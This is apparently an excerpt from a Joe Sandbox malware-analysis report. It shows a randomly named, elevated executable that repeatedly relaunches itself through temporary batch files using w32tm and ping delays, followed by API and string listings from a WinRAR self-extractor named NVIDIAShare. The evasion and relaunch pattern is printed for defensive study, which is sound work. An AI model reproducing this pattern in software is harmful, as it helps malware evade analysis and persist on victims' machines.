Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x6f0000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	22
Start time:	07:37:24
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\cMdeBf80Aw.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	23
Start time:	07:37:24
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	24
Start time:	07:37:24
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	25
Start time:	07:37:24
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	26
Start time:	07:37:29
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x1b0000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	27
Start time:	07:37:31
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\B0uJAwGmBV.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	28
Start time:	07:37:31
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	29
Start time:	07:37:32
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	30
Start time:	07:37:32
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7de670000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	31
Start time:	07:37:41
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x300000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	32
Start time:	07:37:43
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\s4Al4mMfKa.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	33
Start time:	07:37:44
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	35
Start time:	07:37:44
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	36
Start time:	07:37:44
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	37
Start time:	07:37:49
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x160000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	38
Start time:	07:37:51
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\sxRqhXCXyo.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	39
Start time:	07:37:51
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	40
Start time:	07:37:51
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	41
Start time:	07:37:52
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7de670000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	42
Start time:	07:38:01
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0xf10000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	43
Start time:	07:38:04
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\ij3ogloIkp.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	44
Start time:	07:38:04
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	45
Start time:	07:38:04
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	46
Start time:	07:38:04
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	47
Start time:	07:38:10
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x780000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	48
Start time:	07:38:12
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\1QWUF8ga47.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	49
Start time:	07:38:12
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	50
Start time:	07:38:12
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	51
Start time:	07:38:13
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	52
Start time:	07:38:18
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x7b0000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	53
Start time:	07:38:20
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\FuUFRpewDb.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	54
Start time:	07:38:20
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	55
Start time:	07:38:21
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	56
Start time:	07:38:21
Start date:	13/01/2025
Path:	C:\Windows\System32\PING.EXE
Wow64 process (32bit):	false
Commandline:	ping -n 10 localhost
Imagebase:	0x7ff7de670000
File size:	22'528 bytes
MD5 hash:	2F46799D79D22AC72C241EC0322B011D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	57
Start time:	07:38:30
Start date:	13/01/2025
Path:	C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Local\hBoBqOIwjXsCbkOMEKwZ.exe"
Imagebase:	0x540000
File size:	1'937'408 bytes
MD5 hash:	833E95D4CE4E4A4AD42322F75AE6FF57
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	58
Start time:	07:38:32
Start date:	13/01/2025
Path:	C:\Windows\System32\cmd.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\L4pr7KvdK9.bat"
Imagebase:	0x7ff606850000
File size:	289'792 bytes
MD5 hash:	8A2122E8162DBEF04694B9C3E0B6CDEE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	59
Start time:	07:38:33
Start date:	13/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6d64d0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	60
Start time:	07:38:33
Start date:	13/01/2025
Path:	C:\Windows\System32\chcp.com
Wow64 process (32bit):	false
Commandline:	chcp 65001
Imagebase:	0x7ff7b5ed0000
File size:	14'848 bytes
MD5 hash:	33395C4732A49065EA72590B14B64F32
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	61
Start time:	07:38:33
Start date:	13/01/2025
Path:	C:\Windows\System32\w32tm.exe
Wow64 process (32bit):	false
Commandline:	w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2
Imagebase:	0x7ff7d3db0000
File size:	108'032 bytes
MD5 hash:	81A82132737224D324A3E8DA993E2FB5
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Has exited:	true

Show Windows behavior

Target ID:	74
Start time:	07:39:02
Start date:	13/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	94
Start time:	07:39:41
Start date:	13/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Target ID:	109
Start time:	07:40:11
Start date:	13/01/2025
Path:	C:\Windows\System32\Conhost.exe
Wow64 process (32bit):
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:
Has administrator privileges:
Programmed in:	C, C++ or other language
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	9.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	9.2%
Total number of Nodes:	1507
Total number of Limit Nodes:	28

Executed Functions

Function 0101DF1E Relevance: 40.4, APIs: 17, Strings: 6, Instructions: 195
filesleeptimeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 01010863: GetModuleHandleW.KERNEL32(kernel32), ref: 0101087C
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDllDirectoryW), ref: 0101088E
Part of subcall function 01010863: GetProcAddress.KERNEL32(00000000,SetDefaultDllDirectories), ref: 010108BF

Part of subcall function 0101A64D: GetCurrentDirectoryW.KERNEL32(?,?), ref: 0101A655

Part of subcall function 0101AC16: OleInitialize.OLE32(00000000), ref: 0101AC2F
Part of subcall function 0101AC16: GdiplusStartup.GDIPLUS(?,?,00000000), ref: 0101AC66
Part of subcall function 0101AC16: SHGetMalloc.SHELL32(01048438), ref: 0101AC70

GetCommandLineW.KERNEL32 ref: 0101DF5C
OpenFileMappingW.KERNEL32(000F001F,00000000,winrarsfxmappingfile.tmp), ref: 0101DF83
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00007104), ref: 0101DF94
UnmapViewOfFile.KERNEL32(00000000), ref: 0101DFCE

Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNELBASE(sfxcmd,?), ref: 0101DBF4
Part of subcall function 0101DBDE: SetEnvironmentVariableW.KERNEL32(sfxpar,-00000002,00000000,?,?,?,00001000), ref: 0101DC30

CloseHandle.KERNEL32(00000000), ref: 0101DFD7
GetModuleFileNameW.KERNEL32(00000000,0105EC90,00000800), ref: 0101DFF2
SetEnvironmentVariableW.KERNEL32(sfxname,0105EC90), ref: 0101DFFE
GetLocalTime.KERNEL32(?), ref: 0101E009
_swprintf.LIBCMT ref: 0101E048
SetEnvironmentVariableW.KERNEL32(sfxstime,?), ref: 0101E05A
GetModuleHandleW.KERNEL32(00000000), ref: 0101E061
LoadIconW.USER32(00000000,00000064), ref: 0101E078
DialogBoxParamW.USER32(00000000,STARTDLG,00000000,Function_0001B7E0,00000000), ref: 0101E0C9
Sleep.KERNEL32(?), ref: 0101E0F7
DeleteObject.GDI32 ref: 0101E130
DeleteObject.GDI32(?), ref: 0101E140
CloseHandle.KERNEL32 ref: 0101E183

Strings

winrarsfxmappingfile.tmp, xrefs: 0101DF77
STARTDLG, xrefs: 0101E0BE
sfxstime, xrefs: 0101E055
%4d-%02d-%02d-%02d-%02d-%02d-%03d, xrefs: 0101E039
C:\Users\user\Desktop, xrefs: 0101DF33
sfxname, xrefs: 0101DFF9

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: EnvironmentFileHandleVariable$Module$AddressCloseDeleteObjectProcView$CommandCurrentDialogDirectoryGdiplusIconInitializeLineLoadLocalMallocMappingNameOpenParamSleepStartupTimeUnmap_swprintf
String ID: %4d-%02d-%02d-%02d-%02d-%02d-%03d$C:\Users\user\Desktop$STARTDLG$sfxname$sfxstime$winrarsfxmappingfile.tmp
API String ID: 3049964643-2656992072
Opcode ID: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
Instruction ID: 169e5dbff5c2af2d6a366f8b436719e9cd35bf404b3d500c8d1c4dd929759af2
Opcode Fuzzy Hash: 98571407ce26698e408db54a3c591e95b01a4d7f3a819676e33d0d0f1718ea66
Instruction Fuzzy Hash: F761E4B1904345AFE331ABA5DD88FAB7BECBB94704F00042DFAC596188DB7E9944C761

Function 0101A6C2 Relevance: 19.4, APIs: 10, Strings: 1, Instructions: 100
memorywindowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindResourceW.KERNEL32(?,PNG,00000000,?,?,?,0101B73D,00000066), ref: 0101A6D5
SizeofResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A6EC
LoadResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A703
LockResource.KERNEL32(00000000,?,?,?,0101B73D,00000066), ref: 0101A712
GlobalAlloc.KERNELBASE(00000002,00000000,?,?,?,?,?,0101B73D,00000066), ref: 0101A72D
GlobalLock.KERNEL32(00000000), ref: 0101A73E
CreateStreamOnHGlobal.COMBASE(00000000,00000000,?), ref: 0101A762
GlobalUnlock.KERNEL32(00000000), ref: 0101A7C6

Part of subcall function 0101A626: GdipAlloc.GDIPLUS(00000010), ref: 0101A62C

GdipCreateHBITMAPFromBitmap.GDIPLUS(?,?,00FFFFFF), ref: 0101A7A7
GlobalFree.KERNEL32(00000000), ref: 0101A7CD

Strings

PNG, xrefs: 0101A6C6

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Global$Resource$AllocCreateGdipLock$BitmapFindFreeFromLoadSizeofStreamUnlock
String ID: PNG
API String ID: 211097158-364855578
Opcode ID: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
Instruction ID: e05d5d054f1fd598029e52923233c4dccdc7b72c1e9bcef851d0c4173ac94a04
Opcode Fuzzy Hash: 03066ddc74fc67631f2715b65c1019b2ae00592fe11e1429bc582744f819ae31
Instruction Fuzzy Hash: 4F318F75601342AFD7219F65DC88D2B7FBCFF84661B000959F986C7218EB3AD8448BA0

Function 0100A69B Relevance: 7.6, APIs: 5, Instructions: 105
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindFirstFileW.KERNELBASE(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6C4

Part of subcall function 0100BB03: _wcslen.LIBCMT ref: 0100BB27

FindFirstFileW.KERNELBASE(?,?,?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6F2
GetLastError.KERNEL32(?,?,00000800,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A6FE
FindNextFileW.KERNEL32(?,?,?,?,?,?,0100A592,000000FF,?,?), ref: 0100A728
GetLastError.KERNEL32(?,?,?,?,0100A592,000000FF,?,?), ref: 0100A734

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: FileFind$ErrorFirstLast$Next_wcslen
String ID:
API String ID: 42610566-0
Opcode ID: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction ID: 82c9a94e331b1a8179dbaa81df9ac3a2e6ae24bb7387d15eb40314522a7b4148
Opcode Fuzzy Hash: b836a4f60e53b1d4c5fde3395dd085f2cc390187ab7799c6322274763df0cbb3
Instruction Fuzzy Hash: 56412F76600615EBDB26DF68CC84AE9B7B8FB48350F144196E59ED3240D7346E94CF90

Function 01027DEE Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E0F
TerminateProcess.KERNEL32(00000000,?,01027DC4,00000000,0103C300,0000000C,01027F1B,00000000,00000002,00000000), ref: 01027E16
ExitProcess.KERNEL32 ref: 01027E28

Memory Dump Source

Source File: 00000000.00000002.2048543196.0000000001001000.00000020.00000001.01000000.00000003.sdmp, Offset: 01000000, based on PE: true

Associated: 00000000.00000002.2048182477.0000000001000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2048872456.0000000001033000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.000000000103E000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001045000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049023913.0000000001062000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001063000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2049564757.0000000001076000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_1000000_NVIDIAShare.jbxd

Similarity

API ID: Process$CurrentExitTerminate
